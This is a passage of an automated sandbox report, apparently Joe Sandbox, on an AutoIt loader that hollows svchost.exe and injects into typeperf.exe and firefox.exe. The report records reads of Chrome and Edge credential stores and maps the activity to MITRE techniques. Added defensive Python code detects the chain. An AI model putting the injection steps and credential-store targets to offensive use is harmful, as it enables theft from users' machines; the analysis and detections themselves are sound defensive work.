            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F7BA mov eax, dword ptr fs:[00000030h]9_2_03C2F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C43740 mov eax, dword ptr fs:[00000030h]9_2_03C43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C43740 mov eax, dword ptr fs:[00000030h]9_2_03C43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C43740 mov eax, dword ptr fs:[00000030h]9_2_03C43740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6674D mov esi, dword ptr fs:[00000030h]9_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6674D mov eax, dword ptr fs:[00000030h]9_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6674D mov eax, dword ptr fs:[00000030h]9_2_03C6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C30750 mov eax, dword ptr fs:[00000030h]9_2_03C30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72750 mov eax, dword ptr fs:[00000030h]9_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72750 mov eax, dword ptr fs:[00000030h]9_2_03C72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D03749 mov eax, dword ptr fs:[00000030h]9_2_03D03749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB4755 mov eax, dword ptr fs:[00000030h]9_2_03CB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B765 mov eax, dword ptr fs:[00000030h]9_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B765 mov eax, dword ptr fs:[00000030h]9_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B765 mov eax, dword ptr fs:[00000030h]9_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2B765 mov eax, dword ptr fs:[00000030h]9_2_03C2B765
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C38770 mov eax, dword ptr fs:[00000030h]9_2_03C38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40770 mov eax, dword ptr fs:[00000030h]9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C37703 mov eax, dword ptr fs:[00000030h]9_2_03C37703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C35702 mov eax, dword ptr fs:[00000030h]9_2_03C35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C35702 mov eax, dword ptr fs:[00000030h]9_2_03C35702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6C700 mov eax, dword ptr fs:[00000030h]9_2_03C6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C30710 mov eax, dword ptr fs:[00000030h]9_2_03C30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C60710 mov eax, dword ptr fs:[00000030h]9_2_03C60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6F71F mov eax, dword ptr fs:[00000030h]9_2_03C6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6F71F mov eax, dword ptr fs:[00000030h]9_2_03C6F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEF72E mov eax, dword ptr fs:[00000030h]9_2_03CEF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C33720 mov eax, dword ptr fs:[00000030h]9_2_03C33720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4F720 mov eax, dword ptr fs:[00000030h]9_2_03C4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4F720 mov eax, dword ptr fs:[00000030h]9_2_03C4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4F720 mov eax, dword ptr fs:[00000030h]9_2_03C4F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF972B mov eax, dword ptr fs:[00000030h]9_2_03CF972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6C720 mov eax, dword ptr fs:[00000030h]9_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6C720 mov eax, dword ptr fs:[00000030h]9_2_03C6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D0B73C mov eax, dword ptr fs:[00000030h]9_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D0B73C mov eax, dword ptr fs:[00000030h]9_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D0B73C mov eax, dword ptr fs:[00000030h]9_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D0B73C mov eax, dword ptr fs:[00000030h]9_2_03D0B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29730 mov eax, dword ptr fs:[00000030h]9_2_03C29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C29730 mov eax, dword ptr fs:[00000030h]9_2_03C29730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C65734 mov eax, dword ptr fs:[00000030h]9_2_03C65734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3973A mov eax, dword ptr fs:[00000030h]9_2_03C3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3973A mov eax, dword ptr fs:[00000030h]9_2_03C3973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6273C mov eax, dword ptr fs:[00000030h]9_2_03C6273C
Source: C:\Windows\SysWOW64\svchost.exe | Code functions reading the PEB (mov r32, dword ptr fs:[00000030h]); one row per function, giving the register(s) loaded and the number of fs:[30h] reads in that function:

Function        Register(s)   Reads
9_2_03C6273C    ecx, eax      2
9_2_03CAC730    eax           1
9_2_03C6A6C7    ebx, eax      2
9_2_03C3B6C0    eax           6
9_2_03CF16CC    eax           4
9_2_03CEF6C7    eax           1
9_2_03C616CF    eax           1
9_2_03CC36EE    eax           6
9_2_03C5D6E0    eax           2
9_2_03C636EF    eax           1
9_2_03CAE6F2    eax           4
9_2_03CB06F1    eax           2
9_2_03CED6F0    eax           1
9_2_03CB368C    eax           4
9_2_03C34690    eax           2
9_2_03C6C6A6    eax           1
9_2_03C2D6AA    eax           2
9_2_03C276B2    eax           3
9_2_03C666B0    eax           1
9_2_03C4C640    eax           1
9_2_03CF866E    eax           2
9_2_03C6A660    eax           2
9_2_03C69660    eax           2
9_2_03C62674    eax           1
9_2_03C61607    eax           1
9_2_03CAE609    eax           1
9_2_03C6F603    eax           1
9_2_03C4260B    eax           7
9_2_03C33616    eax           2
9_2_03C72619    eax           1
9_2_03C4E627    eax           1
9_2_03C2F626    eax           9
9_2_03C66620    eax           1
9_2_03D05636    eax           1
9_2_03C68620    eax           1
9_2_03C3262C    eax           1
9_2_03C655C0    eax           1
9_2_03D035D7    eax           1

That is 83 PEB reads across 38 functions. Reading the PEB is not malicious on its own (the CRT, inline GetProcessHeap and BeingDebugged checks all do it); the weight here comes from the fact that these functions span roughly 900 KB (0x03C2xxxx to 0x03D0xxxx), far more than svchost.exe's own image, so they belong to code that was placed in the process by the injection recorded elsewhere in this report.
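The fs:[30h] loads tallied above have a fixed 32-bit x86 encoding and can be counted in a raw dump without a disassembler. The scanner below is an added example (not part of the Joe Sandbox report or of the sample) that finds the `mov r32, fs:[30h]` (PEB) and `mov r32, fs:[18h]` (TEB) forms in a code buffer and summarises them per register; SAMPLE is a constructed byte string, not bytes from the svchost.exe dumps.

```python
"""Find 32-bit x86 PEB/TEB reads (`mov r32, dword ptr fs:[30h]` / fs:[18h]) in a
raw code buffer. Added example, not part of the sandbox report; SAMPLE is a
constructed buffer, not bytes taken from the svchost.exe dumps."""
import re

# 32-bit register names indexed by the ModRM reg field.
REGS = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")

# 64h            FS segment override
# A1 disp32      mov eax, [disp32]   (short form, eax only)
# 8B /r disp32   mov r32,  [disp32]  (mod=00, r/m=101; reg field in bits 3..5)
# disp32 = 0x30  PEB pointer in the TEB;  0x18  TEB self pointer
_PAT = re.compile(
    rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])(?:\x30|\x18)\x00\x00\x00"
)


def find_peb_reads(code: bytes, base: int = 0) -> list[dict]:
    """One record per fs:[30h]/fs:[18h] load: virtual address, register, target."""
    hits = []
    for m in _PAT.finditer(code):
        ins = m.group(0)
        if ins[1] == 0xA1:                       # 64 A1 xx 00 00 00
            reg, disp = "eax", ins[2]
        else:                                    # 64 8B modrm xx 00 00 00
            reg, disp = REGS[(ins[2] >> 3) & 7], ins[3]
        hits.append({
            "va": base + m.start(),
            "reg": reg,
            "disp": disp,
            "target": "PEB" if disp == 0x30 else "TEB",
            "bytes": ins.hex(),
        })
    return hits


def summarize(hits: list[dict]) -> dict[str, int]:
    """Reads per register, the same shape as the per-function rows above."""
    counts: dict[str, int] = {}
    for h in hits:
        counts[h["reg"]] = counts.get(h["reg"], 0) + 1
    return counts


# Constructed snippet: prologue, PEB->Ldr walk, BeingDebugged check, TEB read.
SAMPLE = bytes.fromhex(
    "55 8b ec"               # push ebp; mov ebp, esp
    "64 a1 30 00 00 00"      # mov eax, fs:[30h]            -> PEB
    "8b 40 0c"               # mov eax, [eax+0Ch]           -> PEB.Ldr
    "64 8b 0d 30 00 00 00"   # mov ecx, fs:[30h]            -> PEB
    "0f b6 41 02"            # movzx eax, byte ptr [ecx+2]  -> PEB.BeingDebugged
    "64 8b 1d 18 00 00 00"   # mov ebx, fs:[18h]            -> TEB
    "5d c3"                  # pop ebp; ret
)

if __name__ == "__main__":
    # The base is an arbitrary load address chosen for the demo.
    for h in find_peb_reads(SAMPLE, base=0x03C30000):
        print(f"{h['va']:08X}  mov {h['reg']}, fs:[{h['disp']:02X}h]  ({h['bytes']})")
    print(summarize(find_peb_reads(SAMPLE)))
```

The pattern is a byte search, not a disassembly, so on dense data or mis-aligned code it can match inside another instruction; treat a hit as a candidate and confirm it against a disassembler before counting it, which is the same caveat that applies to the sandbox's own per-function tallies.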

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe | native API calls issued directly; "Direct from" is the address the call was made from:

Syscall                        Direct from
NtWriteVirtualMemory           0x77762E3C
NtMapViewOfSection             0x77762D1C
NtNotifyChangeKey              0x77763C2C
NtCreateMutant                 0x777635CC
NtResumeThread                 0x777636AC
NtProtectVirtualMemory         0x77757B2E
NtQuerySystemInformation       0x77762DFC
NtAllocateVirtualMemory        0x77762BFC
NtReadFile                     0x77762ADC
NtDelayExecution               0x77762DDC
NtWriteVirtualMemory           0x7776490C
NtQueryInformationProcess      0x77762C26
NtResumeThread                 0x77762FBC
NtCreateUserProcess            0x7776371C
NtSetInformationThread         0x777563F9
NtAllocateVirtualMemory        0x77763C9C
NtSetInformationThread         0x77762B4C
NtQueryAttributesFile          0x77762E6C
NtClose                        0x77762B6C
NtReadVirtualMemory            0x77762E8C
NtCreateKey                    0x77762C6C
NtQuerySystemInformation       0x777648CC
NtAllocateVirtualMemory        0x777648EC
NtQueryVolumeInformationFile   0x77762F2C
NtOpenSection                  0x77762E0C
NtDeviceIoControlFile          0x77762AEC
NtAllocateVirtualMemory        0x77762BEC
NtQueryInformationToken        0x77762CAC
NtTerminateThread              0x77762FCC
NtCreateFile                   0x77762FEC
NtOpenFile                     0x77762DCC
NtOpenKeyEx                    0x77762B9C
NtSetInformationProcess        0x77762C5C
NtProtectVirtualMemory         0x77762F9C

All 34 call sites lie within a single region of about 60 KB (0x777563F9 to 0x777648EC), and the set covers the complete process-injection primitive chain (NtCreateUserProcess, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtMapViewOfSection, NtProtectVirtualMemory, NtResumeThread), which matches the injection signatures listed in the overview.
Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Section loaded: NULL | target: C:\Windows\SysWOW64\svchost.exe | protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL | target: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe | protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL | target: C:\Windows\SysWOW64\typeperf.exe | protection: execute and read and write
Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: NULL | target: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe | protection: read write
Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: NULL | target: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe | protection: execute and read and write
Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: NULL | target: C:\Program Files\Mozilla Firefox\firefox.exe | protection: read write
Source: C:\Windows\SysWOW64\typeperf.exe | Section loaded: NULL | target: C:\Program Files\Mozilla Firefox\firefox.exe | protection: execute and read and write
Source: C:\Windows\SysWOW64\typeperf.exe | Thread register set: target process: 7668
Source: C:\Windows\SysWOW64\typeperf.exe | Thread APC queued: target process: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3035008
Source: C:\Users\user\Desktop\sa7Bw41TUq.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\sa7Bw41TUq.exe"
Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe | Process created: C:\Windows\SysWOW64\typeperf.exe "C:\Windows\SysWOW64\typeperf.exe"
Source: C:\Windows\SysWOW64\typeperf.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Note the first "Process created" line: the image is svchost.exe but the command line is the parent's own path, the classic sign of a process started suspended under a different image so that its memory can be replaced, which the "Memory written" and execute/read/write section mappings above complete.
Source: uxEGEjhWYrJv.exe, 0000000B.00000000.1558784686.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp; uxEGEjhWYrJv.exe, 0000000B.00000002.3737395933.0000000000FD0000.00000002.00000001.00040000.00000000.sdmp; uxEGEjhWYrJv.exe, 0000000E.00000000.1757198063.0000000001160000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: uxEGEjhWYrJv.exe, 0000000B.00000000.1558784686.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp; uxEGEjhWYrJv.exe, 0000000B.00000002.3737395933.0000000000FD0000.00000002.00000001.00040000.00000000.sdmp; uxEGEjhWYrJv.exe, 0000000E.00000000.1757198063.0000000001160000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: uxEGEjhWYrJv.exe, 0000000B.00000000.1558784686.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp; uxEGEjhWYrJv.exe, 0000000B.00000002.3737395933.0000000000FD0000.00000002.00000001.00040000.00000000.sdmp; uxEGEjhWYrJv.exe, 0000000E.00000000.1757198063.0000000001160000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
Source: uxEGEjhWYrJv.exe, 0000000B.00000000.1558784686.0000000000FD1000.00000002.00000001.00040000.00000000.sdmp; uxEGEjhWYrJv.exe, 0000000B.00000002.3737395933.0000000000FD0000.00000002.00000001.00040000.00000000.sdmp; uxEGEjhWYrJv.exe, 0000000E.00000000.1757198063.0000000001160000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: sa7Bw41TUq.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
(The last string is the Send() key-name table together with the "Exit"/"Script Paused" tray-menu strings of the AutoIt3 runtime, so the submitted sample is an AutoIt-compiled loader; the Shell_TrayWnd/Progman strings in the injected uxEGEjhWYrJv.exe belong to the same runtime's window lookups.)

            Stealing of Sensitive Information

Source: Yara match | File source: 9.2.svchost.exe.400000.0.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 9.2.svchost.exe.400000.0.unpack | type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp | type: MEMORY
Source: C:\Windows\SysWOW64\typeperf.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\typeperf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\typeperf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\typeperf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\typeperf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\typeperf.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\typeperf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\typeperf.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\typeperf.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
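The chain recorded above (sa7Bw41TUq.exe starting svchost.exe with its own command line and mapping an execute/read/write section into it, typeperf.exe starting firefox.exe, and typeperf.exe opening the Chrome and Edge credential stores and the Outlook MAPI profile key) is visible in ordinary endpoint telemetry without any FormBook-specific indicator. The rules below are an added example, not part of the Joe Sandbox report, evaluated over constructed events that mirror the report's lines plus two benign controls; the event schema (kind, image, target, cmdline, protection) is an assumption and would map onto Sysmon process-create, CreateRemoteThread/section-map, file and registry events in a real pipeline.

```python
"""Detection rules for the injection-then-theft chain in this report, run over
constructed events (not real telemetry) that mirror its 'Process created',
'Section loaded', 'File opened' and 'Key opened' lines.
Added example, not Joe Sandbox output; event field names are assumptions."""
import ntpath
import re

BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}
MAIL_CLIENTS = {"outlook.exe"}
# Chromium credential and cookie stores, the files typeperf.exe opened above.
CRED_STORE_RE = re.compile(
    r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\.*"
    r"(Login Data|Web Data|Cookies|Local State)$", re.I)
# MAPI profile key under which stored mail account credentials live.
OUTLOOK_PROFILE_RE = re.compile(
    r"\\Windows Messaging Subsystem\\Profiles\\Outlook", re.I)


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


def _cmdline_image(cmdline: str) -> str:
    """First token of a command line, honouring a quoted executable path."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline.split('"')[1]
    return cmdline.split()[0] if cmdline else ""


def check_event(ev: dict) -> list[str]:
    """Names of the rules a single event trips (empty list = benign)."""
    hits = []
    src, kind = _name(ev["image"]), ev["kind"]
    if kind == "process_create":
        child = _name(ev["target"])
        claimed = _cmdline_image(ev.get("cmdline", ""))
        # Hollowing tell: svchost.exe launched with the parent's own command line.
        if claimed and _name(claimed) != child:
            hits.append("image_cmdline_mismatch")
        # Every legitimate svchost.exe is a child of services.exe.
        if child == "svchost.exe" and src != "services.exe":
            hits.append("svchost_from_nonservice_parent")
        # A performance-counter tool has no business starting a browser.
        if child in BROWSER_IMAGES and src not in BROWSER_IMAGES | {"explorer.exe"}:
            hits.append("browser_spawned_by_lolbin")
    elif kind == "section_map" and "execute" in ev.get("protection", ""):
        hits.append("rwx_section_mapped_into_foreign_process")
    elif kind == "file_open" and CRED_STORE_RE.search(ev["target"]) and src not in BROWSER_IMAGES:
        hits.append("browser_credential_store_read")
    elif kind == "reg_open" and OUTLOOK_PROFILE_RE.search(ev["target"]) and src not in MAIL_CLIENTS:
        hits.append("outlook_profile_enumeration")
    return hits


def run(events: list[dict]) -> list[tuple[str, str, str]]:
    """(rule, source image, target) for every rule hit across an event stream."""
    return [(rule, ev["image"], ev["target"])
            for ev in events for rule in check_event(ev)]


# Constructed events mirroring the report, then two benign controls.
EVENTS = [
    {"kind": "process_create", "image": r"C:\Users\user\Desktop\sa7Bw41TUq.exe",
     "target": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": r'"C:\Users\user\Desktop\sa7Bw41TUq.exe"'},
    {"kind": "section_map", "image": r"C:\Users\user\Desktop\sa7Bw41TUq.exe",
     "target": r"C:\Windows\SysWOW64\svchost.exe",
     "protection": "execute and read and write"},
    {"kind": "process_create", "image": r"C:\Windows\SysWOW64\typeperf.exe",
     "target": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'},
    {"kind": "file_open", "image": r"C:\Windows\SysWOW64\typeperf.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"kind": "file_open", "image": r"C:\Windows\SysWOW64\typeperf.exe",
     "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"},
    {"kind": "reg_open", "image": r"C:\Windows\SysWOW64\typeperf.exe",
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Windows Messaging Subsystem\Profiles\Outlook"},
    {"kind": "file_open", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"kind": "process_create", "image": r"C:\Windows\System32\services.exe",
     "target": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
]

if __name__ == "__main__":
    for rule, image, target in run(EVENTS):
        print(f"{rule:40} {ntpath.basename(image)} -> {target}")
```

Two caveats for production use: the parent check trusts the parent PID the OS reports, which a loader can spoof with the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute, so it should be paired with the section-map and command-line rules rather than used alone; and the credential-store rule needs an allowlist for legitimate readers such as backup agents and the browsers' own crash reporters, which will otherwise generate noise.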

            Remote Access Functionality

Source: Yara match | File source: 9.2.svchost.exe.400000.0.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 9.2.svchost.exe.400000.0.unpack | type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.3737461666.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3737315515.0000000000B60000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3725825178.00000000005B0000.00000040.80000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000009.00000002.1688985587.0000000009690000.00000040.10000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000009.00000002.1671982092.00000000067E0000.00000040.10000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3737482520.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 00000009.00000002.1670445021.0000000000400000.00000040.80000000.00040000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3739752184.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp | type: MEMORY
MITRE ATT&CK Matrix (the number after a technique is how many of this report's signatures map to it; the matrix's unfilled template cells are omitted):

Reconnaissance: no mapped signatures
Resource Development: no mapped signatures
Initial Access: no mapped signatures
Execution: no mapped signatures
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (412); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1)
Defense Evasion: Process Injection (412); Obfuscated Files or Information (3); Virtualization/Sandbox Evasion (2); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1)
Discovery: Security Software Discovery (121); System Information Discovery (12); Virtualization/Sandbox Evasion (2); Process Discovery (2); File and Directory Discovery (2); Application Window Discovery (1)
Lateral Movement: no mapped signatures
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1)
Command and Control: Non-Application Layer Protocol (4); Application Layer Protocol (4); Ingress Tool Transfer (3); Encrypted Channel (1)
Exfiltration: no mapped signatures
Impact: no mapped signatures
Behavior Graph (ID 1529872, sample sa7Bw41TUq.exe, start date 09/10/2024, architecture WINDOWS, score 100), as a process tree:

sa7Bw41TUq.exe (1) started
  signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  -> svchost.exe started
